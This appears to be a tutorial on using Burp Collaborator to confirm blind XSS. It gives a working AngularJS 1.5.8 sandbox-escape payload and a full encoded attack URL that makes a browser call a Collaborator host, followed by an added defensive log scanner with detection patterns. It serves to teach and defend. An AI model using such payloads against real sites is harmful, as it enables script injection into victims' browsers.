Burp Collaborator

Using Burp Collaborator

In Burp

  1. Open Burp - Burp Collaborator Client
  2. Click Copy to clipboard; you will get a URL such as xxxx.burpcollaborator.net

On the XSS page

  1. Put the URL into the payload

Example

https://liveoverflow.com/php/angularjs/angular1.5.8.php is a page for testing XSS in Angular 1.5.8.

Payload

{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,(new(Image)).src="//ffyifd2eed1kxwoezzyjfl77hynobd.burpcollaborator.net",a')}}

Visit the following URL:
https://liveoverflow.com/php/angularjs/angular1.5.8.php?q=%7B%7Ba%3DtoString%28%29.constructor.prototype%3Ba.charAt%3Da.trim%3B%24eval%28%27a%2C%28new%28Image%29%29.src%3D%22%2F%2Fffyifd2eed1kxwoezzyjfl77hynobd.burpcollaborator.net%22%2Ca%27%29%7D%7D

At this point you should see a request to Collaborator in the Burp Collaborator Client.

Note the Referer: the request came from liveoverflow.com.
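
On the server side, the request above leaves a recognisable trace in the access log: a query parameter that decodes to an AngularJS `{{...}}` expression referencing an out-of-band host. The following is an added example, not part of the original page, that flags such log lines; the log lines, the /search path and the OOB_SUFFIXES list are constructed assumptions, and the keyword check is a heuristic.

```javascript
// Added example: flag logged requests carrying an AngularJS {{...}} expression.
const OOB_SUFFIXES = ['burpcollaborator.net']; // assumption: add your own interaction domains

// URLSearchParams decodes once; decode further (bounded) to catch double-encoding.
function fullyDecode(value, maxRounds = 3) {
  let cur = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; } // malformed %xx: stop
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Return one finding per {{...}} expression found in any query parameter.
function inspectTarget(target) {
  const url = new URL(target, 'http://log.invalid'); // base is only needed for parsing
  const findings = [];
  for (const [param, raw] of url.searchParams) {
    const exprs = fullyDecode(raw).match(/\{\{[\s\S]*?\}\}/g) || [];
    for (const expr of exprs) {
      const hosts = (expr.match(/\/\/[a-z0-9.-]+/gi) || []).map(h => h.slice(2).toLowerCase());
      const oobHosts = hosts.filter(h => OOB_SUFFIXES.some(s => h === s || h.endsWith('.' + s)));
      findings.push({ param, sandboxEscape: /constructor|\$eval/.test(expr), oobHosts });
    }
  }
  return findings;
}

// Pull the request target out of each access-log line and keep the flagged ones.
function scanLog(lines) {
  const flagged = [];
  for (const line of lines) {
    const m = line.match(/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/);
    if (!m) continue;
    const findings = inspectTarget(m[1]);
    if (findings.length) flagged.push({ target: m[1], findings });
  }
  return flagged;
}

const SAMPLE_LOG = [ // constructed lines; the first target is the URL shown above
  '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /php/angularjs/angular1.5.8.php?q=%7B%7Ba%3DtoString%28%29.constructor.prototype%3Ba.charAt%3Da.trim%3B%24eval%28%27a%2C%28new%28Image%29%29.src%3D%22%2F%2Fffyifd2eed1kxwoezzyjfl77hynobd.burpcollaborator.net%22%2Ca%27%29%7D%7D HTTP/1.1" 200 512',
  '203.0.113.8 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=angular HTTP/1.1" 200 128',
  '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /search?q=%257B%257Bitem%257D%257D HTTP/1.1" 200 128',
];
console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

A finding with `sandboxEscape: true` and a non-empty `oobHosts` corresponds to the request described above; an expression with neither (the third line) is still worth reviewing because the parameter is being interpreted as a template.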

Burp Collaborator Presentation

The slides alone are enough; the talk just reads the slides aloud.

Tool

Handy Collaborator

Ref

Exploiting a Blind XSS using Burp Suite | Agarri : Sécurité informatique offensive
